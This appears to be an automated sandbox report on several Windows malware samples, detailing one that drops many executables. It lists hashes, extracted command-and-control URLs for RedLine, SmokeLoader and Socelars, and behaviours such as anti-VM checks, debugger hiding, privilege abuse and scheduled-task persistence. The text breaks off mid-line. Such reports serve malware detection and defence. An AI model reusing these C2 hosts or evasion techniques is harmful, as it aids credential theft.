022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows11_x64
10022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows11_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows11_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows11_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows11_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows11_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
10cbf31d825a...d2.exe
windows11_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows7_x64
10db76a117db...12.exe
windows11_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows7_x64
10e2ffb8aeeb...f6.exe
windows11_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows7_x64
10f2196668f4...cb.exe
windows11_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
101s -
max time network
201s -
platform
windows11_x64 -
resource
win11 -
submitted
10/11/2021, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral5
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win11
Behavioral task
behavioral6
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win11
Behavioral task
behavioral9
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211014
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win11
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win11
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral17
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win11
Behavioral task
behavioral18
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral19
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win11
Behavioral task
behavioral21
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211014
Behavioral task
behavioral22
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win7-en-20211104
Behavioral task
behavioral23
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win11
Behavioral task
behavioral24
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win7-en-20211014
Behavioral task
behavioral26
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win11
Behavioral task
behavioral27
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211104
Behavioral task
behavioral28
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win7-en-20211014
Behavioral task
behavioral29
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win11
Behavioral task
behavioral30
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Malware Config
Extracted
socelars
http://www.hhgenice.top/
Extracted
redline
tatreriash.xyz:80
Extracted
smokeloader
2020
http://nalirou70.top/
http://xacokuo80.top/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/5324-307-0x0000000000360000-0x0000000000380000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x00040000000002c6-167.dat family_socelars behavioral2/files/0x00040000000002c6-168.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
description pid Process procid_target PID 5352 created 5036 5352 WerFault.exe 102 PID 5676 created 2680 5676 WerFault.exe 89 PID 5584 created 4624 5584 WerFault.exe 88 PID 5948 created 768 5948 WerFault.exe 171 PID 6056 created 3184 6056 WerFault.exe 160 PID 2020 created 4492 2020 WerFault.exe 86 -
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/4196-367-0x0000000000690000-0x00000000006B1000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/768-328-0x00000000022D0000-0x00000000023A5000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
pid Process 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4752 97tPLM1BD83QAkW3t_oh9ywr.exe 4492 Up_EgQSePP1xxhPBvlLFqEqe.exe 4624 6Gjg3NTuW9hb7SqYymgdkeKo.exe 2680 tG94gZUleeBFo8SDyi6butFz.exe 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe 3944 o6NHz5BzimLqOLMlh9XEgPbX.exe 4400 ZvQmBbFSxCcYQP4fGiwTawkt.exe 768 cTOmx3wyJ995falPyP_CHHr6.exe 4640 KdlTj_CCMiXvvrf22JrhXXT5.exe 4936 yJqr3GGVaG4To30s0MDWLG61.exe 3736 wn6Tr5ouTTYnpiBNWaXIcaFu.exe 884 dsqTtt9nQpWwz1yYMBAEipS6.exe 2964 XATuOQAsPCyh5ifJCHUEKp4p.exe 3312 Gn5a2G1hE46fGK_8y4mb1keQ.exe 5036 kMCLvaZxUoL4ETDwWQqOc6MX.exe 4196 33CEtghZf4kJPxQoBSqEUgkF.exe 4532 cBHStp1tUjbmpWGPeFPixzx7.exe 4760 IDyIlZ0vcJMZmpFNQrobzffX.exe 2088 DJQTgMZwK7ZPTQPNMIvPAKa5.exe 4076 LPvnU5MCa7evfTEqGJQeEKaS.exe 2172 D9RJLCLd2f8688ZYCUxUkMQi.exe 3184 Cf1aoIESdkQ91XunX7mxtiH7.exe 1832 cutm3.exe 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe 6048 Gn5a2G1hE46fGK_8y4mb1keQ.exe 6140 2905016.exe 5116 8syYjhN1kDn7VeWxv1eGSMvd.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral2/files/0x000d0000000002b3-207.dat vmprotect behavioral2/files/0x000d0000000002b3-206.dat vmprotect behavioral2/memory/4760-289-0x0000000140000000-0x0000000140FFB000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dsqTtt9nQpWwz1yYMBAEipS6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dsqTtt9nQpWwz1yYMBAEipS6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yJqr3GGVaG4To30s0MDWLG61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yJqr3GGVaG4To30s0MDWLG61.exe -
Loads dropped DLL 2 IoCs
pid Process 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
-
resource yara_rule behavioral2/files/0x000500000000c300-186.dat themida behavioral2/files/0x000700000000c8df-189.dat themida behavioral2/files/0x0003000000009c70-188.dat themida behavioral2/files/0x000300000001e5e7-205.dat themida behavioral2/memory/4936-253-0x0000000000B30000-0x0000000000B31000-memory.dmp themida behavioral2/memory/3736-272-0x0000000000DB0000-0x0000000000DB1000-memory.dmp themida behavioral2/memory/4532-264-0x0000000000C20000-0x0000000000C21000-memory.dmp themida behavioral2/memory/884-341-0x0000000000900000-0x0000000000901000-memory.dmp themida behavioral2/files/0x000100000002b20c-412.dat themida behavioral2/files/0x000400000002b1fc-428.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yJqr3GGVaG4To30s0MDWLG61.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dsqTtt9nQpWwz1yYMBAEipS6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP address.
flow ioc 107 ipinfo.io 107 ip-api.com 120 ipinfo.io 163 ipinfo.io 165 api.db-ip.com 167 api.db-ip.com 3 ipinfo.io 37 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 884 dsqTtt9nQpWwz1yYMBAEipS6.exe 4936 yJqr3GGVaG4To30s0MDWLG61.exe 3736 wn6Tr5ouTTYnpiBNWaXIcaFu.exe 4532 cBHStp1tUjbmpWGPeFPixzx7.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4492 set thread context of 5324 4492 Up_EgQSePP1xxhPBvlLFqEqe.exe 119 PID 3312 set thread context of 6048 3312 schtasks.exe 130 -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe XATuOQAsPCyh5ifJCHUEKp4p.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe XATuOQAsPCyh5ifJCHUEKp4p.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini DJQTgMZwK7ZPTQPNMIvPAKa5.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 5968 2680 WerFault.exe 89 5832 5036 WerFault.exe 102 6084 4624 WerFault.exe 88 5440 768 WerFault.exe 93 3204 1476 WerFault.exe 90 6088 4752 WerFault.exe 87 6080 4076 WerFault.exe 104 5804 4640 WerFault.exe 92 4696 228 WerFault.exe 199 2156 2360 WerFault.exe 217 4172 4080 WerFault.exe 213 1560 5044 WerFault.exe 216 -
NSIS installer 4 IoCs
resource yara_rule behavioral2/files/0x000100000002b1c9-291.dat nsis_installer_1 behavioral2/files/0x000100000002b1c9-291.dat nsis_installer_2 behavioral2/files/0x000100000002b1c9-303.dat nsis_installer_1 behavioral2/files/0x000100000002b1c9-303.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5608 schtasks.exe 3792 schtasks.exe 3312 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 104 taskkill.exe 3716 taskkill.exe 5772 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 
4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 1408 svchost.exe Token: SeCreatePagefilePrivilege 1408 svchost.exe Token: SeCreateTokenPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeAssignPrimaryTokenPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeLockMemoryPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeIncreaseQuotaPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeMachineAccountPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeTcbPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSecurityPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeTakeOwnershipPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeLoadDriverPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemProfilePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemtimePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeProfSingleProcessPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeIncBasePriorityPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreatePagefilePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreatePermanentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeBackupPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeRestorePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeShutdownPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeDebugPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeAuditPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemEnvironmentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeChangeNotifyPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeRemoteShutdownPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeUndockPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSyncAgentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe 
Token: SeEnableDelegationPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeManageVolumePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeImpersonatePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreateGlobalPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 31 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 32 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 33 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 34 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 35 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeDebugPrivilege 3944 o6NHz5BzimLqOLMlh9XEgPbX.exe Token: SeRestorePrivilege 5832 WerFault.exe Token: SeBackupPrivilege 5832 WerFault.exe Token: SeBackupPrivilege 5832 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1408 wrote to memory of 5092 1408 svchost.exe 84 PID 1408 wrote to memory of 5092 1408 svchost.exe 84 PID 1436 wrote to memory of 4728 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 1436 wrote to memory of 4728 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 1476 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 1476 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 1476 1436 
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 4640 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to memory of 4640 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to 